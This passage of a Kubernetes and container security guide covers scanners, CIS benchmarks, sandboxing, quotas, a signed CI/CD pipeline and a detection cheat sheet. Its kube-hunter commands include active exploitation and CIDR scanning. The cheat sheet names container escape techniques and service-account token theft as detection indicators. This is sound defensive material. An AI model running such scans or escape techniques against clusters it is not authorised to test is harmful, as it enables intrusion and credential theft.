SBOM support:

  • Harbor stores SBOMs as OCI artifacts (media type application/vnd.goharbor.harbor.sbom.v1)
  • Single-layer manifest per SBOM, associated with parent image artifact
  • Processor pulls SBOM layer blob on demand for vulnerability correlation

Scan controller interface (from source):

  • Scan() -- trigger scan for artifact with configurable options
  • ScanAll() -- bulk scan with async support
  • GetReport() -- retrieve scan results by mime type
  • GetVulnerable() -- check artifact against CVE allowlist, returns vulnerability count + severity
  • Stop() / StopScanAll() -- cancel running scans

10. CIS Kubernetes Benchmark (kube-bench)

Purpose

Automated checks against CIS Kubernetes Benchmark standards. Validates master node, worker node, etcd, and policy configurations.

Usage

# Run as Kubernetes Job
kubectl apply -f job.yaml
kubectl logs <pod-name>

# Platform-specific jobs available for EKS, GKE, AKS

# Run directly
kube-bench run --targets master,node,etcd,policies

Key Check Categories

  • Master node: API server flags, controller-manager, scheduler configuration
  • Worker node: kubelet configuration, proxy settings
  • etcd: Encryption, authentication, peer communication
  • Policies: RBAC, pod security, network policies, secrets management

Output: PASS/FAIL/WARN per check with remediation guidance.

Modern alternative: Trivy now includes CIS scanning as both CLI and K8s Operator, providing unified vulnerability + compliance scanning.


11. Kubernetes Penetration Testing (kube-hunter)

Capabilities

Attack simulation tool that identifies exploitable vulnerabilities in Kubernetes clusters.

Scanning Modes

# Remote scan (from outside the cluster)
kube-hunter --remote some.cluster.com

# Internal scan (on cluster machine)
kube-hunter --interface

# Pod-based scan (deploy as K8s Job for internal perspective)
kubectl create -f ./job.yaml

# Active mode (attempts exploitation)
kube-hunter --active

# CIDR scanning
kube-hunter --cidr 192.168.0.0/24

# Node auto-discovery via K8s API
kube-hunter --k8s-auto-discover-nodes

Detection Categories

| Category | Description |
|---|---|
| Service exposure | Open K8s services and ports |
| Network weaknesses | Misconfigured network policies |
| Authentication gaps | Missing/weak authentication |
| Privilege escalation | Elevation opportunities |
| Container escapes | Pod isolation failures |

Core Hunter Modules

  • HostDiscovery: IP range generation
  • PortDiscovery: Known K8s service port scanning
  • FromPodHostDiscovery: Subnet discovery from pod context
  • Collector + SendFullReport: Finding aggregation and reporting
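The PortDiscovery idea above can be illustrated with a short standalone sketch (this is not kube-hunter code; the port list and service labels are assumptions based on well-known Kubernetes defaults):

```python
import socket

# Well-known Kubernetes service ports (illustrative subset).
K8S_PORTS = {
    6443: "kube-apiserver (HTTPS)",
    8080: "kube-apiserver (insecure, legacy)",
    10250: "kubelet API",
    10255: "kubelet read-only (legacy)",
    2379: "etcd client",
}

def probe(host: str, timeout: float = 0.5) -> dict:
    """Return the subset of K8S_PORTS accepting a TCP connection on host."""
    open_ports = {}
    for port, service in K8S_PORTS.items():
        try:
            with socket.create_connection((host, port), timeout=timeout):
                open_ports[port] = service
        except OSError:
            continue  # closed, filtered, or unreachable
    return open_ports

if __name__ == "__main__":
    for port, service in probe("127.0.0.1").items():
        print(f"open: {port} ({service})")
```

Only run probes like this against clusters you are authorized to test.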

12. Kubernetes Resource Security Scoring (kubesec)

Purpose

Static analysis of Kubernetes resource manifests for security misconfigurations.

Usage

# CLI scan
kubesec scan deployment.yaml

# Docker
cat deployment.yaml | docker run -i kubesec/kubesec:v2 scan /dev/stdin

# HTTP API
curl -sSX POST --data-binary @deployment.yaml https://v2.kubesec.io/scan

# As kubectl plugin
kubectl kubesec scan -f deployment.yaml

Scoring

  • Negative scores: Critical security issues (privileged containers, hostPID, etc.)
  • Positive scores: Security best practices (non-root, read-only rootFS, resource limits)
  • Output: JSON with object ID, validity, score, matched rules, and remediation
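The scoring model can be sketched as a toy re-implementation; the rule set and point values below are illustrative, not kubesec's actual weights:

```python
# Toy kubesec-style scoring over a parsed pod spec. Rules inspect either the
# pod-level spec or an individual container; weights are made up for the demo.
RULES = [
    ("privileged container",
     lambda pod, c: c.get("securityContext", {}).get("privileged"), -30),
    ("hostPID enabled",
     lambda pod, c: pod.get("hostPID"), -9),
    ("runs as non-root",
     lambda pod, c: c.get("securityContext", {}).get("runAsNonRoot"), 10),
    ("read-only root filesystem",
     lambda pod, c: c.get("securityContext", {}).get("readOnlyRootFilesystem"), 3),
]

def score_pod(pod_spec: dict):
    """Sum rule points per container; a negative total flags critical issues."""
    total, matched = 0, []
    for container in pod_spec.get("containers", []):
        for desc, check, points in RULES:
            if check(pod_spec, container):
                total += points
                matched.append(desc)
    return total, matched

pod = {
    "hostPID": True,
    "containers": [{
        "name": "app",
        "securityContext": {"privileged": True, "readOnlyRootFilesystem": True},
    }],
}
# Privileged + hostPID outweigh the read-only root filesystem: net negative.
print(score_pod(pod))
```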

Integration Points

  • CLI for local development
  • HTTP server for microservice deployment
  • Admission controller for runtime enforcement
  • kubectl plugin for operator workflow

13. Kubernetes Goat -- Vulnerable Lab Scenarios

Interactive security training platform with 22 scenarios covering real-world K8s attack vectors:

Attack Scenarios

#  | Scenario                    | Category       | Security Lesson
1  | Sensitive Keys in Codebases | Secrets        | Credential exposure in images/repos
2  | DIND Exploitation           | Runtime        | Container runtime abuse
3  | SSRF in Kubernetes          | Network        | SSRF targeting internal K8s services
4  | Container Escape to Host    | Isolation      | Breaking container boundaries
5  | Docker CIS Benchmarks       | Compliance     | Container security standards
6  | Kubernetes CIS Benchmarks   | Compliance     | Cluster configuration standards
7  | Attacking Private Registry  | Supply Chain   | Unauthorized registry access
8  | Misconfigured NodePort      | Exposure       | Unprotected service exposure
10 | Crypto Miner Containers     | Workload       | Malicious workload detection
11 | Namespace Bypass            | Isolation      | Namespace isolation weaknesses
12 | Environment Information     | Recon          | Metadata extraction techniques
13 | DoS Resources               | Availability   | Resource exhaustion attacks
15 | Hidden in Container Layers  | Supply Chain   | Vulnerabilities in image layers
16 | RBAC Misconfiguration       | Access Control | Authorization bypass via weak policies
17 | KubeAudit                   | Auditing       | Cluster configuration auditing
18 | Falco Runtime Security      | Detection      | Behavioral monitoring
19 | Popeye Cluster Sanitizer    | Hygiene        | Security assessment/validation
20 | Network Security Policies   | Network        | Communication boundary enforcement
21 | Cilium Tetragon eBPF        | Detection      | Runtime enforcement with eBPF
22 | Kyverno Policy Engine       | Policy         | Policy-based hardening

14. Runtime Sandboxing

Options Beyond Standard Containers

Technology      | Isolation Level  | Mechanism         | Syscall Coverage                          | Use Case
gVisor (runsc)  | Strong           | User-space kernel | ~70% Linux syscalls via ~20 host syscalls | Multi-tenant workloads
Kata Containers | Very Strong      | Lightweight VMs   | Full kernel                               | Untrusted workloads
Firecracker     | Very Strong      | microVMs          | Restricted via seccomp + cgroups          | Serverless / FaaS
Standard (runc) | Namespace/cgroup | Shared kernel     | Full kernel access                        | Trusted workloads

RuntimeClass Configuration

apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: gvisor
handler: runsc
---
apiVersion: v1
kind: Pod
metadata:
  name: sandboxed-pod
spec:
  runtimeClassName: gvisor
  containers:
  - name: app
    image: myapp:latest

Kernel Module Prevention

Blacklist unnecessary kernel modules on K8s nodes:

# /etc/modprobe.d/kubernetes-blacklist.conf
blacklist dccp
blacklist sctp
blacklist rds
blacklist tipc

15. Resource Quotas & Limit Ranges (DoS Prevention)

apiVersion: v1
kind: ResourceQuota
metadata:
  name: compute-resources
  namespace: production
spec:
  hard:
    pods: "20"
    requests.cpu: "4"
    requests.memory: 4Gi
    limits.cpu: "8"
    limits.memory: 8Gi
    persistentvolumeclaims: "10"
---
apiVersion: v1
kind: LimitRange
metadata:
  name: default-limits
  namespace: production
spec:
  limits:
  - default:
      memory: 256Mi
      cpu: 500m
    defaultRequest:
      memory: 128Mi
      cpu: 250m
    type: Container
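The arithmetic the ResourceQuota admission check performs is simple: current usage plus the new pod's requests must stay within `spec.hard`. A sketch of that check, with quantities pre-converted to base units (CPU in millicores, memory in Mi) to avoid unit parsing:

```python
# Mirrors the hard limits from the ResourceQuota above.
QUOTA_HARD = {"pods": 20, "requests.cpu_m": 4000, "requests.memory_mi": 4096}

def admits(current_usage: dict, pod_requests: dict) -> bool:
    """True if the namespace quota still has room for the new pod."""
    projected = {
        "pods": current_usage["pods"] + 1,
        "requests.cpu_m": current_usage["requests.cpu_m"] + pod_requests["cpu_m"],
        "requests.memory_mi": current_usage["requests.memory_mi"] + pod_requests["memory_mi"],
    }
    return all(projected[k] <= QUOTA_HARD[k] for k in QUOTA_HARD)

usage = {"pods": 19, "requests.cpu_m": 3800, "requests.memory_mi": 3900}
# Rejected: projected CPU requests would reach 4050m, over the 4000m hard cap.
print(admits(usage, {"cpu_m": 250, "memory_mi": 128}))
```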

16. Complete CI/CD Security Pipeline

Pipeline Architecture

Source → Build → Scan → Sign → Store → Deploy → Monitor
  │        │       │      │       │       │        │
  │        │       │      │       │       │        └─ Falco runtime detection
  │        │       │      │       │       └─ Admission controller (verify signature)
  │        │       │      │       └─ Harbor registry (RBAC, replication)
  │        │       │      └─ Cosign keyless signing + attestation
  │        │       └─ Trivy (CVEs) + Dockle (lint) + Grype (SBOM scan)
  │        └─ SLSA L3 hardened build (provenance generated)
  │
  └─ Syft SBOM generation at source

GitHub Actions Example

name: Secure Container Pipeline
on: [push]

env:
  # Example image reference; substitute your own registry and repository
  IMAGE: registry.example.com/myorg/app:${{ github.sha }}

jobs:
  build-scan-sign:
    runs-on: ubuntu-latest
    permissions:
      id-token: write  # For keyless signing
      contents: read
      security-events: write

    steps:
    - uses: actions/checkout@v4

    # Build
    - name: Build image
      run: docker build -t $IMAGE .

    # Generate SBOM
    - name: Generate SBOM
      run: syft $IMAGE -o spdx-json=sbom.spdx.json

    # Lint image
    - name: Lint with Dockle
      run: dockle --exit-code 1 --exit-level fatal $IMAGE

    # Scan for vulnerabilities
    - name: Scan with Trivy
      uses: aquasecurity/trivy-action@master
      with:
        image-ref: ${{ env.IMAGE }}
        severity: 'CRITICAL,HIGH'
        exit-code: '1'

    # Scan SBOM with Grype
    - name: Scan SBOM
      run: grype sbom:./sbom.spdx.json --fail-on high

    # Push to registry
    - name: Push image
      run: docker push $IMAGE

    # Sign image (keyless)
    - name: Sign with Cosign
      run: cosign sign $IMAGE --yes

    # Attach SBOM as attestation
    - name: Attest SBOM
      run: cosign attest --predicate sbom.spdx.json --type spdxjson $IMAGE --yes

Admission Controller Verification

# Kyverno policy to verify image signatures
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: verify-image-signatures
spec:
  validationFailureAction: Enforce
  rules:
  - name: verify-cosign-signature
    match:
      any:
      - resources:
          kinds:
          - Pod
    verifyImages:
    - imageReferences:
      - "registry.example.com/*"
      attestors:
      - entries:
        - keyless:
            issuer: "https://token.actions.githubusercontent.com"
            subject: "https://github.com/myorg/*"
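The `imageReferences` matching a policy like the one above applies to incoming pod images is glob-based; a rough standalone approximation (Kyverno's real matcher handles registries, tags, and digests more precisely than `fnmatch` does):

```python
from fnmatch import fnmatch

# Mirrors the policy's imageReferences list above.
ALLOWED = ["registry.example.com/*"]

def image_allowed(image: str) -> bool:
    """True if the image reference matches any allowed glob pattern."""
    return any(fnmatch(image, pattern) for pattern in ALLOWED)

print(image_allowed("registry.example.com/team/app:1.4.2"))  # True
print(image_allowed("docker.io/library/nginx:latest"))       # False
```

Images that match then proceed to signature verification against the keyless attestor; everything else is rejected outright when `validationFailureAction` is `Enforce`.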

17. Detection Cheat Sheet

Container Escape Indicators

Indicator                     | Detection Method             | ATT&CK
nsenter execution             | Falco rule on process spawn  | T1611
chroot to host path           | Falco rule on chroot syscall | T1611
Mount operations in container | Falco rule on mount syscall  | T1611
Cgroup release_agent write    | File integrity monitoring    | T1611
/proc/1/root access           | Falco rule on file access    | T1611
Device file access (/dev/sda) | Falco rule on open syscall   | T1611
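A Falco rule covering the first indicator might look like the following sketch (Falco's bundled rulesets ship similar detections; the rule name and tags here are illustrative):

```yaml
- rule: Launch nsenter in Container
  desc: Detect nsenter spawned inside a container (possible namespace escape)
  condition: >
    spawned_process and container and proc.name = nsenter
  output: >
    nsenter launched in container (user=%user.name command=%proc.cmdline
    container=%container.name image=%container.image.repository)
  priority: WARNING
  tags: [container_escape, T1611]
```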

Kubernetes API Abuse Indicators

Indicator                     | Detection Method                        | ATT&CK
Secret enumeration (list all) | Audit log: verb=list resource=secrets   | T1552.007
Pod creation with hostPath    | Admission controller + audit log        | T1610
Privileged pod creation       | PSA enforcement + audit log             | T1610
ClusterRole binding changes   | Audit log: resource=clusterrolebindings | T1098
Service account token theft   | Falco rule on token file read           | T1528
Exec into pod                 | Audit log: subresource=exec             | T1609
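Matching these indicators against API server audit logs can be sketched as follows; the inline events are illustrative, but the field names (`verb`, `objectRef.resource`, `objectRef.subresource`, `user.username`) follow the `audit.k8s.io/v1` Event schema. Note that `kubectl exec` appears in audit logs as a `create` on the `exec` subresource:

```python
# Illustrative audit events (trimmed to the fields the checks need).
events = [
    {"verb": "list", "objectRef": {"resource": "secrets"},
     "user": {"username": "system:serviceaccount:default:app"}},
    {"verb": "get", "objectRef": {"resource": "pods", "namespace": "prod"},
     "user": {"username": "jane"}},
    {"verb": "create", "objectRef": {"resource": "pods", "subresource": "exec",
     "namespace": "prod"}, "user": {"username": "jane"}},
]

def suspicious(event: dict):
    """Map an audit event to the indicator it matches, if any."""
    ref = event.get("objectRef", {})
    if event["verb"] == "list" and ref.get("resource") == "secrets":
        return "secret enumeration (T1552.007)"
    if ref.get("subresource") == "exec":
        return "exec into pod (T1609)"
    return None

for e in events:
    hit = suspicious(e)
    if hit:
        print(f"{e['user']['username']}: {hit}")
```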

Supply Chain Attack Indicators

Indicator                     | Detection Method                     | ATT&CK
Unsigned image deployment     | Admission controller (Cosign verify) | T1195.002
Image from untrusted registry | ImagePolicyWebhook                   | T1195.002
New CVE in running image      | Continuous scanning (Harbor/Trivy)   | T1195.002
SBOM deviation from baseline  | Syft diff between builds             | T1195.001
Modified provenance metadata  | SLSA verification failure            | T1195.002
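The "SBOM deviation from baseline" check amounts to diffing the package sets of two SBOMs. A sketch over trimmed SPDX-style documents (field names `packages`, `name`, `versionInfo` follow SPDX JSON; the inline data is illustrative):

```python
# Baseline SBOM from the previous build vs. the current build's SBOM.
baseline = {"packages": [
    {"name": "openssl", "versionInfo": "3.0.13"},
    {"name": "zlib", "versionInfo": "1.3"},
]}
current = {"packages": [
    {"name": "openssl", "versionInfo": "3.0.13"},
    {"name": "zlib", "versionInfo": "1.3.1"},
    {"name": "curl", "versionInfo": "8.7.1"},
]}

def package_set(sbom: dict) -> set:
    """Reduce an SPDX-style SBOM to a set of (name, version) pairs."""
    return {(p["name"], p.get("versionInfo", "")) for p in sbom["packages"]}

def sbom_diff(old: dict, new: dict):
    """Return (added, removed) package sets between two SBOMs."""
    added = package_set(new) - package_set(old)
    removed = package_set(old) - package_set(new)
    return added, removed

added, removed = sbom_diff(baseline, current)
print("added:", sorted(added))      # curl 8.7.1 and the zlib 1.3.1 bump appear
print("removed:", sorted(removed))  # zlib 1.3 disappears
```

An unexpected addition (a package no build step introduced) is the signal worth alerting on; version bumps are usually routine.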

18. Key References & Tools Summary

Tool            | Purpose                                               | Category
Trivy           | Multi-scanner (CVEs, secrets, misconfig, SBOM)        | Vulnerability
Grype           | Vulnerability scanner with EPSS/KEV prioritization    | Vulnerability
Syft            | SBOM generator (SPDX, CycloneDX)                      | Supply Chain
Cosign          | Container signing/verification (keyless via Sigstore) | Supply Chain
Dockle          | Container image linter (CIS Docker Benchmark)         | Compliance
kube-bench      | CIS Kubernetes Benchmark checker                      | Compliance
kube-hunter     | K8s penetration testing / attack simulation           | Offensive
kubesec         | K8s manifest security scoring                         | Compliance
Falco           | Runtime syscall monitoring + rule engine              | Detection
Harbor          | Registry with integrated scanning, signing, SBOM      | Registry
imgcrypt        | Container image layer encryption                      | Confidentiality
OPA/Gatekeeper  | Policy engine admission controller                    | Policy
Kyverno         | K8s-native policy engine                              | Policy
Kubernetes Goat | Vulnerable K8s lab (22 scenarios)                     | Training
gVisor          | User-space kernel sandbox (runsc)                     | Isolation
Kata Containers | Lightweight VM isolation                              | Isolation
